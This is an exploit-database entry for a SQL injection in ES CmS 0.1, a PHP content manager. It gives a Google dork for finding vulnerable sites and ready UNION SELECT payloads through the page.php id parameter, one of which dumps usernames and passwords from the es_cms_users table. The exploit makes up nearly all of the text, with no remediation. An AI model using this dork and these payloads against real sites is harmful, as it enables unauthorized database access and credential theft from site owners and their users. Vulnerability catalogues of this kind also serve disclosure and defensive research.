[] NeoSense
E X P L O I T S
title author type platform port cve id

ES CmS 0.1 - SQL Injection

Author: hossein beizaee
type: webapps
platform: php
port: 
date_added: 2012-11-25 
date_updated: 2012-11-25 
verified: 1 
codes: OSVDB-87868 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comescms_alpha_v0_1.zip
# Exploit Title: ES CmS 0.1 Sql Injection Vulnerability

# Google Dork: inurl:/page.php?id=

# Date: 2012

# Exploit Author: MR.XpR

# Software Link: http://es-cms.com , http://sourceforge.net/projects/escms/files/esCMS Alpha/0.1/escms_alpha_v0_1.zip

# Version: v.0.1

# Tested on: BT , 7


# Poc :

http://localhost/page.php?id=[sqli]


# D3mo :

http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char(table_cod)

http://server/page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users


# TNx To :

My Brothers Siamak.Black(Black.Boy) , UnknowN

 everything is not true ,The real is dream
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.